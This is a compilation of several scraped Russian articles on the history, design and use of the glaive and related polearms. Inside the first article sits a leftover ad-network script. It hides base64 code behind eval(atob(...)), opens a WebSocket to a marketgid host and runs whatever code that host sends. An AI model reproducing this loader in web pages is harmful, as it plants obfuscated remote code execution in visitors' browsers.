Глефа: история оружия, его описание и особенности использования

Глефа: история оружия, его описание и особенности использования

Глефа: история оружия, его описание и особенности использования

.adslot_2 { display:inline-block; width: 336px; height: 280px; }
@media (min-device-width:970px) { .adslot_2 { width: 630px; height: 90px; } }

(adsbygoogle = window.adsbygoogle || []).push({});

Глефа (или глевия) – это разновидность древкового холодного оружия рубящего и колющего действия, которая была чрезвычайно популярна у европейской пехоты на протяжении XV-XVI столетий. Она состояла из длинного древка (от 1,2 до 1,5 метра) и внушительного клинка-наконечника, внешне очень напоминающего фальшион.

Глефа – это довольно универсальный вид холодного оружия, которое позволяет пехотинцу успешно противостоять противнику как в условиях сомкнутого, так и распадющего строя.

Как и любое другое длиннодревкое оружие, она давала возможность своему владельцу держать противника на приличном расстоянии.

Глефа – это оружия, которое давало пешему воину неплохие шансы отбить атаку всадника, особенно если речь идет об отряде пехотинцев.

Сегодня известно множество разновидностей этого оружия, которое существовало в различные исторические периоды у разных народов. Некоторые исследователи говорят о сотне различных модификаций этого оружия.

Описание оружия и история его возникновения

Как уже было сказано выше, глефа состояла из двух частей: длинного древка и массивного клинка-наконечника. Древко усиливали заклепками или закрывали металлическими полосами, чтобы уберечь от перерубывания. Хотя, даже если древко глефы и ломалось, то клинок с обломком рукояти вполне можно было использовать в бою.

Наконечник глефы отличался значительной длинной (до 60 см) и внушительной шириной (она иногда достигала 7 см), форма его могла быть разной: с хорошо выраженным острием или вообще без него. Заточка клинка была односторонней.

Отличительной чертой наконечника глефы являлось наличие шипа — его называли «острый палец», – который чаще всего отходил от нижней части клинка и был направлен под небольшим углом в сторону острия оружия.

Основной функцией этого элемента было придание оружию дополнительной мощи при нанесении колющих ударов, а также захват оружия противника при отражении атаки сверху.

Глефы имели огромное количество разновидностей, которые отличались в первую очередь формой клинка-наконечника. Есть описание и двухклинковых или двухсторонних глеф, однако многие историки очень сомневаются, что подобное оружие когда-нибудь существовало в действительности.

Такие глефы имели наконечники на каждой стороне древка, иногда их даже описывают обоюдоострыми.

Конечно, подобное оружие смотрится довольно эффектно – не зря его так полюбили голливудские режиссеры и создатели компьютерных игр – но как им пользоваться в реальном бою, совершенно непонятно.

Если говорить об истории появления глефы, то она весьма туманна. Этимология этого названия не совсем понятна. Большинство современных исследователей считает, что оно произошло от названия римского меча гладиуса.

В ранних английских и французских источниках «глефой» называли обычное копье, а иногда и обычный меч.

Существующее ныне значение это слово приобрело только в XV веке, хотя глефу достаточно активно использовали уже во второй половине XIV столетия.

var d = new Date, script621759 = document.createElement(“script”), mg_ws621759 = {};script621759.type = “text/javascript”;script621759.charset = “utf-8”;script621759.src = “//jsc.marketgid.com/m/i/militaryarms.ru.621759.js?t=” + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script621759.onerror = function () { mg_ws621759 = new Worker(URL.

createObjectURL(new Blob([‘eval(atob(“ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MjE3NTkoZSl7dmFyIGg9bWdfd3M2MjE3NTkub25tZXNzYWdlOyBtZ193czYyMTc1OS5yZWFkeVN0YXRlPT1tZ193czYyMTc1OS5DTE9TRUQmJihtZ193czYyMTc1OT1uZXcgV2ViU29ja2V0KG1nX3dzNjIxNzU5X2xvY2F0aW9uKSksbWdfd3M2MjE3NTkub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjE3NTkobWdfd3M2MjE3NTksZnVuY3Rpb24oKXttZ193czYyMTc1OS5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjE3NTkoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MjE3NTkoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MjE3NTlfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYyMTc1OSA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MjE3NTlfbG9jYXRpb24pLCBtZ193czYyMTc1OS5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MjE3NTkoZS5kYXRhKX0=”))’]), {type: “application/javascript”})); mg_ws621759.onmessage = function (msg){window.eval(msg.data);}; mg_ws621759.postMessage(‘js|’+script621759.src+’|M366665Composite621759|M366665Composite621759’);};document.body.appendChild(script621759);

В рукописи XIV века из Амброзианской библиотеки изображен итальянский воин, вооруженный глефой. К концу этого столетия она стала привычным вооружением пехотинца.

В Бургундии глефы особенно приглянулись арбалетчикам, легендарный Карл Смелый требовал, чтобы глефы обязательно входили в состав вооружения передовых отрядов пехоты.

Можно еще добавить, что глефа отлично подходила для отражения атак кавалерии.

К концу XV столетия пехотинцев нередко называли «глефами».

В начале XVI века глефы стали излюбленным оружием немецкой пехоты. На поле битвы при Мюльберге осталось большое количество этого оружия, часть из которого сохранилось до наших дней и сегодня находится в музеях. После появления огнестрельного оружия значение глефы стало постепенно уменьшаться.

Глефа нередко использовалась в качестве оружия придворных отрядов телохранителей, поэтому сегодня в музеях и частных коллекциях можно встретить образцы, богато украшенные золотом или чернением.

Весьма популярны глефы были при французском дворе, а также в Мантуе, Венеции и Флоренции. В качестве церемониального оружия глефы использовались вплоть до XVIII века.

Правда, при этом она полностью потеряла свое боевое значение и стала просто богатой игрушкой, символом статуса.

Разновидностью глефы является куза, которая впервые встречается во Франции, в XV веке. Это оружие отличалось от глефы отсутствием направленного острия и ножевидной формой наконечника, который предназначался для нанесения преимущественно рубящих ударов. Кроме того, куза не имела шипа или любых других дополнительных элементов.

В последние годы путаница относительно глефы только усилилась. Дело в том, что это оружие очень пришлось по душе создателям фэнтези, аниме и компьютерных игрушек.

Именно на просторах интернета существует «страшная зазубренная глефа», абсолютно фантастической формы и непонятного предназначения. Кроме того, в последние годы на просторах игр и книг появилась «метательная глефа», напоминающая японский сюрикэн-переросток.

Она не только крошит врагов десятками, но и способна возвращаться к хозяину в случае неточного броска.

Как использовали глефу

Основным преимуществом глефы, впрочем, как и любого другого длиннодревкого оружия был его значительный радиус поражения.

Воин, вооруженный мечом, шпагой, булавой или топором, вряд ли сможет достать пехотинца, у которого в руках находится глефа. Этим оружием редко кололи, гораздо чаще рубили.

В сомкнутом строю воин с глефой в основном наносил удары сверху вниз, однако если у него появлялось свободное пространство, то арсенал боевых приемов значительно увеличивался.

В этом случае можно было использовать среднюю и нижнюю часть древка, его противоположный конец. Как и любого длиннодревкого оружия у глефы было слабое место. Ее удар могли отразить щитом или же перехватить за древко рукой, что приводило к обезоруживанию воина. Понятно, что глефа была не слишком эффективной в ближнем бою.

Ну и последнее, что можно добавить. Глефа была тяжелым и мощным оружием, предназначенным для поражения воина в тяжелых доспехах. Так что она не слишком хорошо подходила для филигранного фехтования.

Запись Глефа: история оружия, его описание и особенности использования впервые появилась .

Источник: https://qoqao.ru/?p=28771

Глефа — оружие средневековья: двухклинковая — миф или правда, боевое применение, история появление, как выглядит

Интерес к довольно редкому оружию средневековой Европы — глефе часто связан с произведениями Ника Перумова. Прочитав о подвигах Кэра Лаэды возникает желание поподробнее узнать о замечательном оружии, которым он так ловко расправлялся с многочисленными врагами. Вот только правда может сильно разочаровать.

Так что же такое глефа как оружие, для чего и кому требовалась и как применялась – об этом пойдет речь дальше.

Когда и как появилась глефа

Практически до середины XIX века, потери в бою происходили, в основном, от холодного оружия (до 90%). Побеждал тот, кто лучше сражался в рукопашной, и у кого больше подходило для этого оружие.

По характеру нанесения ран глефа относится к колюще-рубящему, а по устройству к древковому виду холодного оружия. К ее появлению привели два фактора:

  1. Экономический. Оснастить всех воинов оружием во все времена являлось дорогостоящей затеей, а уж в раннем средневековье железное оружие было особенно дорого. Только к XV веку с ростом городов появилась возможность его массового производства.
  2. Изменения в тактике боя. Появились большие конные отряды. Противостоять им легко мог строй пехотинцев с длинными копьями. Но остановить – пол дела. Дальше требовалось атаковать. Вставал вопрос выбора оружия. На рыцаре прочная броня. Хорош топор, но короток. Копьем в ближнем бою из-за длины орудовать проблематично.

Фламандцы для этой цели использовали двуручную палицу с крюком (годендаг). Двуручные мечи и фламберги по боевым возможностям уступали алебардам (а еще цена).

В результате объединения в себе лезвие от меча, шипа от палицы и древка от копья получилась глефа.

Что представляла собой глефа и откуда такое название

Глефа — заточенный с одной стороны обычный меч (типа широкого, 5-7 см, фальшиона) длиной от 40 до 60 сантиметров с отходящим от обуха шипом.

Насаживался меч на рукоятку длиной не более полутора метров. На другой конец древка надевался заостренный наконечник. Иногда вместо наконечника делали шар для противовеса. Двухклинковая глефа использовалась так редко, что почти ничего о ней не известно. Историки сильно сомневаются в их реальном существовании.

Древко старались уберечь от перерубания, увивая металлической лентой или украшая заклепками.

Глефы имели самые разнообразные формы наконечников. Допускалось изготавливать их и с дополнительными лезвиями. Всего известно около сотни модификаций. На востоке существовали свои особенности.

Японская нагината и китайская гуань дао не являлись глефами. Они только похожи на нее. Также очень похожи на глефу куза и совня. Первый не имел шипа и был меньшего размера, а вторая отличалась однолезвийным наконечником.

Во времена использования глеф, они оставались довольно редким оружием. Изготовление глефы требовало применять сталь высокого качества, а это сильно удорожало конечный продукт и было не каждому по карману.

Например, для бердыша допускалось применять низкосортное железо и их производство на Руси поставили на поток.

По поводу названия бытуют разные точки зрения. Большинство филологов считает слово глефа (глефия) французской производной от латинского гладиуса (меч). Другие исследователи справедливо указывают на более ранние ссылки (до XIV века), где под глефой и во французском и в английском языках подразумевается копье.

Вымышленные образцы вооружений, типа эфенская глефа, которые появились в наше время благодаря кинематографу и компьютерным играм, к настоящему оружию не имеют никакого отношения.

Применение глефы

Основное назначение глефы – рубящие удары. Шип, иначе острый палец, использовался при ударах противника сверху. Во-первых, задерживал удар, во-вторых помогал выхватить оружие врага. В-третьих — им самим наносили удар. Наконечник нижней части древка также назывался подтоком или пяткой.

Читайте также:  Форма вдв старого и нового образца: дембельская и парадная

Применяли глефу по всей Европе. Рукописи XIV века содержат иллюстрации, изображающие итальянских солдат с глефами. Немецкая пехота и бургундские арбалетчики в XV веке зачастую имели глефы в качестве вспомогательного вооружения, о чем свидетельствуют картины живописцев и письменные источники того времени.

А, по неподтвержденным сведениям, Уэльс считал ее национальным оружием. Но тут следует осторожнее относиться к терминам. Историки предупреждают, что в то время глефами часто называли большинство древкового оружия.

Владение глефой требовало серьезной подготовки. О том, как она проводилась можно, к примеру, узнать из трудов по фехтованию немецкого мастера этого искусства Ханса Тальхоффера (1420—1460). В них подробно описана работа с мечами, кинжалами, щитами, палицами и древковым оружием, к которому и относится глефа.

В таком качестве глефы прослужили гораздо дольше. На парадах эффектная внешность глефы привлекала всеобщее внимание. Почетные караулы, личные княжеские телохранители – вот кто использовал украшенные гравировками и травлением глефы.

Дворянские и княжеские гербы удачно вписывались в широкую поверхность глеф. До наших дней в музее выставляются художественно оформленные глефы немецкого императора Рудольфа II и австрийского Фердинанда, эрцгерцога Тирольского. Обе изготовлены в XVI веке.

С появлением огнестрельного оружия применение глефы, как и остального холодного оружия, теряло свою значимость и постепенно сходило на нет.

Как видно, Ник Перумов был не прав, назвав двухклинковый инструмент некроманта Неясыти глефой. Это целиком придуманное, не имеющее ничего общего с настоящей глефой оружие. Единственное, что отдаленно напоминает выдумку фантаста, это Чан-чи-дао-би – двусторонний меч шаолиньских монахов.

Видео

Источник: https://WarBook.club/oruzhie/holodnoe/glefa/

Глефа, фошард и чоппер

Глефа (фр. glaive), или глевия, — древковое холодное оружие ближнего боя, разновидность алебарды. Как и остальное длиннодревковое оружие, она входит в широкое употребление начиная с XIV в., особенно популярна среди пехоты в Италии, Бургундии и Саксонии.

Глефа была достаточно универсальным оружием, которое позволяло эффективно сражаться и в условиях сомкнутого строя, и когда он распадался. В сомкнутом построении в основном наносились колющие удары или рубящие сверху вниз.

Когда строй распадался, воин использовал большой арсенал приемов, включающий удары не только верхней частью глефы, но и средней (участком древка, расположенным между рук, можно было ударить противника по лицу или шее), и нижней (попытаться сбить противника с ног, для чего у нее часто был дополнительный крюк). Так, опытный воин мог без усилий удерживать на расстоянии даже искусного фехтовальщика.

К тому же особенности конструкции глефы позволяли захватывать и отводить оружие противника. Из-за длины древка она применялась и против пеших воинов, и против всадников.

Уязвимым местом воина, вооруженного глефой или любым другим длиннодревковым оружием, было отражение атаки щитом противника или, хуже того, захват древка рукой, из-за чего воин становился практически беззащитным перед прямым колющим ударом.

До XVIII в. глефа использовалась в качестве оружия дворцовой стражи, особенно в Венеции и Саксонии. В настоящее время она, как и прежде, состоит на вооружении швейцарской гвардии, охраняющей Ватикан.

Среди глеф встречается много разновидностей. Особенно это касается поздних образцов вооружения дворцовой стражи. Иногда они обладали настолько причудливыми формами, что вообще мало годились для ведения боя.

Фошард, или осадный нож, — древковое оружие XVI в. с таким же наконечником, как у глефы. В сущности, отличие между глефой и фошардом заключалось только в длине древка, которое у фошарда составляло около 1 м.

Были случаи, когда глефа становилась фошардом прямо на поле боя, если противник перерубал древко или оно ломалось каким-либо иным образом. Первые упоминания о фошарде относятся еще к XII в.

Хотя большого распространения этот вид оружия так и не получил, эволюционировав позднее в глефу.

Название фошард (фр. Fauchard) имеет французские корни и, вероятно, является производным от faux — «коса». Поэтому в русскоязычной литературе можно встретить и другое название этого вида холодного оружия — косарь.

Следующее оружие данной группы — чоппер. Отличается еще более коротким древком.

Вообще классификация фальшионов, фошардов, чопперов — задача чрезвычайно сложная, поскольку нет каких-либо норм длины древка, по которым оружие с характерным наконечником можно отнести к чопперам или фошардам.

Так, чоппер, отличающийся только наличием характерного шипа на обухе, вполне можно отнести и к фальшионам. Поэтому в литературе часто встречаются соединенные названия на английский лад, к примеру фальшион-чоппер.

Фошард. Средневековая гравюра

Фальшион-чопперы — общее название оружия ближнего боя


07.11.2018

Источник: http://altpp.ru/zarozhdenie-metallurgii/drekovoe-koljushhe-rubjashhie-oruzhie/glefa-foshard-i-chopper.html

Древковое оружие

Первым в ряду древкового оружия по праву должно быть названо простейшее и древнейшее оружие – копье. Оно не подвергалось никаким конструктивным изменениям со времен античности до XVII века. Его использовали все народы мира. Копьем были вооружены всадники и пехотинцы.

Копья различаются по весу, длине, форме пера (наконечника), а также, разумеется, по назначению. Некоторые виды копий употреблялись в коннице, наиболее тяжелые экземпляры принадлежали рыцарям Средневековья, а турнирные копья имели еще и наконечники в виде распустившихся лилий.

Метательные копья делались легкими, короткими и нередко помещались в специальные колчаны.

Ангоны у северян, фрамеи у германцев, пилумы у римлян, матарис у галлов – простое перечисление этих видов показывает, что даже такие, на первый взгляд, элементарные предметы, как копья, имеют множество разнообразных форм и применений.

Если говорить о вооружении русской армии, то у княжеской дружины основным оружием были копье и меч, а в войсках иноземного строя видную роль играли пики (пиками копья стали именоваться уже в XVII веке).

В войсках, созданных при Алексее Михайловиче по образу и подобию западноевропейской пехоты того времени, важную роль играла правильная пропорция количества стрелков (мушкетеров) и пикинеров, Занятый перезарядкой своего ружья, стрелок становился абсолютно беззащитным, и стоящие в одном ряду с ним пикинеры в это время прикрывали его от нападения вражеской конницы.

Тот же принцип был взят за основу и при составлении пехотного полка в регулярной русской армии. Каждый батальон строился в четыре шеренги, и в первой шеренге через одного стояли пикинеры. Необходимость их присутствия в пехоте отпала лишь с появлением штыка. Именно штык сделал солдата, даже с незаряженной фузеей, вооруженным.

В 1720–м году пики в русской регулярной пехоте были отменены. Любопытно, что в русской кавалерии пика завоевывала признание с трудом. Драгунская конница должна была сначала стрелять и лишь после дружного залпа бросаться в атаку «в клинки». Места пике в этом случае не оставалось. Она была лишь на вооружении иррегулярных – казачьих – частей.

Только во второй половине XVIII столетия в созданных легкоконных полках пикинеры стали их законными обладателями. В начале XIX века этот вид оружия получили вновь образованные уланские полки, а в ходе Войны 1812 года пиками вооружили и гусар. Войны 1820–х годов доказали необходимость пик в кавалерии и их большую эффективность при атаке сомкнутым строем.

В начале 1830–х годов первые шеренги всех кавалерийских и, в том числе, кирасирских полков получают пики, которые и сохраняют до 1917 года. При этом были использованы все пики, которые хранились с прошлых веков в цейхгаузах, и отечественные, и трофейные. Приемы с пикой на полном скаку были чрезвычайно трудны, и очень немногие могли выполнять их безукоризненно.

Одним из таких мастеров упражнений с пикой, большим почитателем и любителем этого вида древкового оружия был великий князь Константин Павлович.

Приемы обращения с пикой. Англия, 1637 год

Интересно, что специально разработанных образцов пик в русской армии было очень немного: пика казачья 1839 года; пика кавалерийская 1843 года; пика кавалерийская 1862 года; пика казачья 1901 года и пика кавалерийская 1910 года.

В наши дни пики считаются экзотикой. Специалистов, умеющих их применять, в России нет. Остается лишь надеяться, что группы исторической реконструкции со временем сумеют возродить искусство владения пикой и мы сможем увидеть российских кавалеристов, исполняющих эти приемы не хуже, чем нынешняя канадская конная полиция.

Алебарду, появившуюся в конце XIII века, можно считать практическим ответом оружейников на пластинчатый доспех. В XIV веке этот вид оружия широко вошел в обиход. Упоминания о нем встречаются уже в описаниях сражений при Маргаренте в 1315 году и при Земпахе в 1386–м. Основная деталь алебарды – это топор, вместо обушка у которого крюк и пика, перо которой могло варьироваться.

Уже в XVI веке наряду с боевыми экземплярами появляется алебарда как парадное оружие. Хочется привести небольшой рассказ об одном музейном предмете, который может быть поучительным для многих коллекционеров.

В собрании оружия Военно–исторического музея артиллерии, инженерных войск и войск связи находится алебарда, которая на некоторое время стала камнем преткновения в исследовательской работе оружейников Санкт–Петербурга.

Во–первых, эта алебарда имеет перо, не характерное для данного вида древкового оружия – в форме рогатины, то есть кабаньего копья, столь широко распространенного в Европе. Во–вторых, декор алебарды, на первый взгляд, позволял предположить ее русское происхождение, что абсолютно не соответствовало ее форме и традициям русского оружия.

С одной стороны на ней вытравлен двуглавый орел, с 1497 года, как известно, являющийся гербом России, а с другой – грифон, герб одного из дистриктов Византии, пришедший на Русь (как и двуглавый орел) вместе с византийской принцессой Софьей Палеолог, супругой Ивана III Васильевича.

Читайте также:  Обзор израильского пистолета-пулемета uzi

Однако форма алебарды, напоминающая западноевропейские образцы XVI столетия, которые в России не применялись, не позволила включить этот предмет в список русского оружия, подготавливавшийся к публикации.

1) Швейцарские алебарды. XV в.2) Алебарда дробантов марк-графа Иоганна-Георга Бранденбургского. 1970

3) Слева направо: алебарда дробантов курфюрста саксонского Христиана I (Германия, 1586-1591); алебарда дробантов курфюрста саксонского Иоанна-Георга II (Германия, около 1660); алебарда дробантов курфюрста саксонского Августа (Германия, около 1580)

Обращение к геральдике позволило выяснить, что не только двуглавый орел, но и грифон, и целый ряд других «симболов и эмблем», пришедших в Россию из Византии, бытовали и в Австрии, которая считалась в Европе правопреемницей великой Римской империи.

Необходимо отметить, что сначала мы повторили ошибку всех оружейников, отыскивая подобные предметы в каталогах военно–исторических музеев и военных коллекций, и уже готовы были констатировать, что имеем у себя единственный в своем роде экземпляр.

Но совершенно неожиданно в собрании Венского художественно–исторического музея был обнаружен аналогичный экспонат, причем не просто атрибутированный как австрийское оружие, но, что бывает чрезвычайно редко, имеющий своего мастера. Речь идет не об оружейнике, ковавшем алебарду, а о художнике, создавшем ее образ.

Венский экземпляр немного отличается по форме от нашего образца, но стилистически он бесспорно принадлежит Хансу Польгаммеру Младшему – придворному художнику императора Фердинанда I.

Ханс Польгаммер Младший работал в Инсбруке в середине XVI века и «с 1563 года рисовал при большом императорском дворе», согласно справочнику Тимма и Беккера.

Творчество этого мастера, как отмечают Тимм и Беккер, в основном сводилось к оформлению погребений и похоронных церемоний. Из военных тем в его работах особое внимание исследователей привлекает травление и золочение шлемов драбантов, относящихся к 1563 году. Не исключено, что для драбантов были созданы и рассматриваемые нами алебарды с государственной символикой.

Эта история лишний раз подтверждает мысль о том, что необходимо знать все об одном и немного обо всем. Атрибуция любого предмета – будь то оружие, мундир, батальная картина или военный портрет – может производиться только при его рассмотрении с точки зрения ряда вспомогательных исторических дисциплин.

В России первой алебардой, официально принятой на вооружение в начале XVIII века, стала сержантская алебарда. Второй А.Н. Кулинский называет бомбардирскую алебарду артиллерийского полка.

Третьей была алебарда пехотного каптенармуса образца 1720 года, четвертой – унтер–офицерская 1731 года, пятой – алебарда мушкетерских унтер–офицеров Голштинских полков периода 1756–1761 годов и шестой, в 1761–1762 годах, – алебарда гвардейских унтер–офицеров.

На рубеже XVIII–XIX веков были приняты алебарда унтер–офицеров армейской пехоты и последняя, восьмая, алебарда унтер–офицеров гвардейской пехоты.

Эспонтон и протазаны

Протазан – предмет офицерского вооружения и даже знак офицерского различия. На европейских протазанах между втулкой и пером имеются два ответвления в форме полумесяца. В России эти два ответвления делались в форме крыльев орла.

В регулярных армиях Европы протазаны находились на вооружении штаб–офицеров и обер–офицеров на протяжении всей первой четверти XVIII века. В руке офицера они служили знаком места сбора, ими подавались команды.

Декор протазанов, как правило, отражает государственную символику.

В 1731 году офицерские протазаны заменили офицерскими эспонтонами, что, вероятнее всего, было вызвано возросшим немецким влиянием в России вообще и в русской армии в частности. Отличались они от Протазанов формой пера и строго горизонтальной поперечиной, а друг от друга – вензелями правящего монарха. Эспонтоны вышли из употребления в русской армии в первом десятилетии XIX века.

Глефа и протазан дворцовой гвардии Шипионе Боргезе-Каффарелли. Рим. Около 1605 года

Глефа в России никогда не применялась, но все же о ней следует сказать несколько слов, так как этот вид древкового оружия получил большое распространение в Европе XIV–XVI веков. Это большой нож, при помощи втулки с прожилинами прикрепленный к древку.

Полагали, что глефы защитят стрелков от кавалерии, и вооружали ими арбалетчиков. В первой половине XVI века глефа была оружием саксонской пехоты.

Только ужасающее поражение, которое саксонцы (протестанты) потерпели 24 апреля 1547 года при Мюльберге от войска императора Священной Римской империи Карла V, заставило задуматься о пригодности глефы в изменившихся условиях боя.

С этого времени она постепенно уходит из боевых порядков армий и появляется во дворцах, где служит украшением церемоний. Здесь уместно вспомнить, что у венецианских дожей была славянская гвардия, вооруженная глефами. Но в этом случае все уже было рассчитано на зрелищный эффект, и даже древко имело 2,5 м в длину.

«Прообразом булавы является древнейшее и простейшее оружие человека – дубина». Эту фразу можно было бы и не цитировать, но она такая простая, точная и емкая, что и не стоит пытаться сказать лучше. На древнейших изображениях мы можем видеть людей с дубинами, палицами и булавами.

1) Турецкие булавы и польский шестопер. XVIII в.
2) Клевец. Германия. Вторая половина XVI в.

В языках многих стран Западной Европы булава обозначается подобными словами; во Франции это – masse, в Англии – mace, в Италии – mazza, в Испании – maza. По всей вероятности, это вариации латинского корня macia, обозначающего данный вид оружия.

На Руси все варианты древкового короткого ударного оружия имели свое наименование. Для булавы было характерно еще и использование польского термина «буздыган». Булаву с яблоком, напоминающим перья, называли пернач; если же перьев было шесть – шестопер.

Прямое, острое как игла навершие древкового оружия именовалось чеканом, а точно такое же, но чуть опущенное вниз, наподобие клюва, называли клевцом. В Италии встречались клевцы, напоминающие клюв попугая, отчего их так и называли – «попугай».

Все это оружие предназначалось для того, чтобы проламывать доспехи, но, когда защитное вооружение перестало существовать, некоторые его виды, и в том числе булавы, стали символами власти и соответственно декорировались.

Нельзя обойти молчанием еще одну разновидность оружия на коротком древке, которую исследователи считают столь же древней, как нож. Речь идет о боевом топоре. Очень часто топоры встречаются среди археологических находок каменного и бронзового веков.

Топоры использовались пешими воинами и всадниками. Передовые бойцы войска Меровингов своими мощными топорами на длинной рукояти вклинивались в ряды противника, и только после того, как в них были «прорублены» бреши. в бой вступали воины со щитами, вооруженные мечами и копьями.

Были в ту эпоху и небольшие топоры, предназначенные специально для метания.

1) Бердыши. Россия. XVII в.
2) Топоры. Россия. XVII в.

Большое распространение получили топоры на севере Европы. В хрониках и летописях перечисляются народы, которые достигли наивысших успехов во владении боевым топором. Горцы Шотландии, датчане, шведы, швейцарцы, поляки, русские – именно их называют непревзойденными в искусстве боя на топорах.

Почти во всех этих странах топорам стали делать длинные рукояти, которые при ходьбе использовались как посохи или как трости. Даже при довольно высоком уровне развития огнестрельного оружия топору находилось применение.

На Руси с 1550 года у стрельцов большие топоры на длинных древках – бердыши – служили не только для рукопашного боя, но и подставкой для пищали при стрельбе.

Как и булавы, топоры, когда военная необходимость в них исчезла, со временем также стали символами власти. Командиры высокого ранга носили булавы, а младшие командиры – топорики. Разумеется, это было не жесткое правило, но, тем не менее, топоры мы видим у пятидесятников и сотников, и на Дону, и в Польше, и на Украине, и в Турции.

Вас может заинтересовать:

Характеристики Teknetics Omega 8000.

Библиотека Ивана Грозного (Либерея).

Решение Мосгорсуда по делу о куфическом дирхеме.

Древковое оружие

Оставить сообщение:

Источник: http://www.pro-kop.ru/articles/book_str_14.php

Глефа

Гле́фа (англ. glaive), она же гле́вия — вид древкового пехотного холодного оружия ближнего боя. Состоит из древка (1,2 — 1,5 метра) и наконечника (40 — 60 сантиметров, ширина 5-7 сантиметров). Древко обычно покрывается заклёпками или увивается металической лентой для предохранения от перерубания.

Наконечник — клинок, имеет вид заточенного только с одной стороны широкого фальчиона. От обуха наконечника отходит параллельный или направленный под небольшим углом к клинку шип (т. н.

«острый палец»), служащий, во-первых, для захвата оружия при отражении удара сверху, а во-вторых, для нанесения более эффективных против закованных в броню противников колющих ударов (в отличие от ударов рубящих, наносимых наконечником). Однако основное предназначение глефы — всё же нанесение именно рубящих ударов.

На нижней части древка также имелся наконечник (т. н. «пятка»), но он обычно не затачивался, а просто заострялся — он использовался в качестве противовеса для балансировки оружия и для добивания раненых[1].

История названия глефа и значения этого слова

Название глефа происходит из французского языка. Практически все исследователи проводят этимологию этого слова к лат. gladius или к кельтскому cladivos, обозначающим «меч». Однако, все ранние английские и французские ссылки на глефу подразумевают копьё.

Именно в этом значении слово глефа фигурирует в английском языке примерно с XIV до середины XVI веков. Своё нынешнее значение слово глефа приобретает с XV века.

Примерно в это же время слово глефа становится поэтическим обозначением меча (именно в этом значении чаще всего используется глефа в современном французском языке).

Начиная с 1980-х годов слово глефа приобрело ещё одно значение и стало обозначать метательное оружие, похожее на сюрикены японских ниндзя, только большего размера.

Это выдуманное оружие зачастую наделяется способностью возвращаться к метнувшему, как бумеранг.

В таком качестве глефы появились на страницах фантастической литературы и в художественных фильмах, (например, пятилепестковая глефа из фильма Крулл).

Читайте также:  Травматический пистолет фантом — произведение турецких инженеров

Модификации глефы

Существовали различные модификации глефы — начиная от одинаковых обоюдоострых узких длинных клинков на обоих концах древка и до широкого, напоминающего топор наконечника на одном конце и простого шарообразного противовеса на другом.

Двухлезвийная модификация встречается крайне редко и является оружием одиночки, так как драться ей можно только на вращении, а в тесной битве боец с такой глефой уничтожит всех вокруг, включая своих собственных соратников.

Всего модификаций глефы около 100[1].

Глефа использовалась как личное оружие с 14-го века, в частности — как личное вооружение арбалетчиков в Бургундии[2]. Хорошо показала себя в качестве оружия для отражения атак конницы. До 18-го века использовалась как оружие дворцовой стражи, затем вышла из употребления. Сейчас глефами вооружена только швейцарская гвардия, охраняющая Ватикан.

Ближайшие аналоги глефы — алебарда, бердыш, совня[3], секира, в качестве возможных аналогов приводятся нагината, протазан (он же партазан). Некоторые энциклопедии[4] вообще относят глефу к алебардам.

Глефа в творчестве Ника Перумова

Глефа упоминается как любимое оружие главного героя пенталогии Ника Перумова «Хранитель мечей» Кэра Лаэды, он же воин Серой Лиги Фесс, он же некромант Неясыть.

Следует заметить, что глефа Фесса не является типичным представителем глеф — она, во-первых, двулезвийная, во-вторых, короткая и очень лёгкая (в отличие от настоящей глефы, которая была тяжёлым оружием, вообще не предназначенным для филигранного фехтования), в-третьих, Фесс без проблем использует её в подвалах и пещерах[5], что для длинного древкового оружия нехарактерно; в-четвёртых, отбить тяжёлой длинной глефой пущенную в упор стрелу можно только по чистой случайности.

В Китае существовали даже трёхлезвийные виды индивидуального оружия — длинный клинок с двумя местами для ухвата руками, которым можно было наносить удары как обоими концами лезвия, так и частью лезвия между ухватами.

Из-за творчества Ника Перумова многие представляют себе глефу исключительно двулезвийной, тогда как двулезвийное оружие в Европе практически не существовало. Двулезвийные виды индивидуального вооружения существовали в Индии и в Китае, где большой упор делался на индивидуальное мастерство бойца[6], но не в Европе, где основной упор ставился на командную работу.

Слово «глефа» в творчестве Марины и Сергея Дяченко

В книге писателей Марины и Сергея Дяченко «Армагед-дом» слово «глефа» имеет другое значение: там это личинка дельфинов, появляющаяся на свет во время апокалипсиса. Смертельно опасна для всего живого. В мире, описанном в романе, разговоры о глефах табуированы, очевидно из-за страха перед ними.

Примечания и сылки на использованные материалы

Категории:

Источник: http://mediaknowledge.ru/17959323687d4078.html

Глефа. Куза

Глефа, глевия (фр. glaive, нем. glefe) – разновидность древкового оружия пехоты с длинным ножевидным наконечником с односторонней заточкой. Иногда глефа называется «боевой косой» или «пробивателем», но это немного неправильно.

Очень близкими ее аналогами являются европейская куза, совня в России и японская нагината. Судя по одной из сохранившихся рукописей, где изображен итальянский солдат, вооруженный глефой, можно сказать, что она была известна уже в XIV веке, а с XV в.

широко распространяется как оружие пехотинцев, а в Бургундии также используется арбалетчиками. Герцог Бургундии Карл Смелый считал, что из тех солдат, которые стоят в первом ряде со стрелками хотя бы один или два в своем вооружении имели меч, кинжал и глефу.

С XVI века глефа вводится на вооружение саксонской пехоты и используется трабантами – самыми опытными воинами. После битвы при Мюльберге в 1547 году (Шмалькальденская война) победившая армия Карла V (имперские войска) оставила после себя на поле боя большое количество этого вида оружия.

Некоторые из тех глеф до сих пор хранятся в Королевском оружейном собрании Вены. Впоследствии, как и алебарда, копье и пика, глефа зарекомендовала себя как отличное оружие против вражеской конницы.

Различные виды глефы

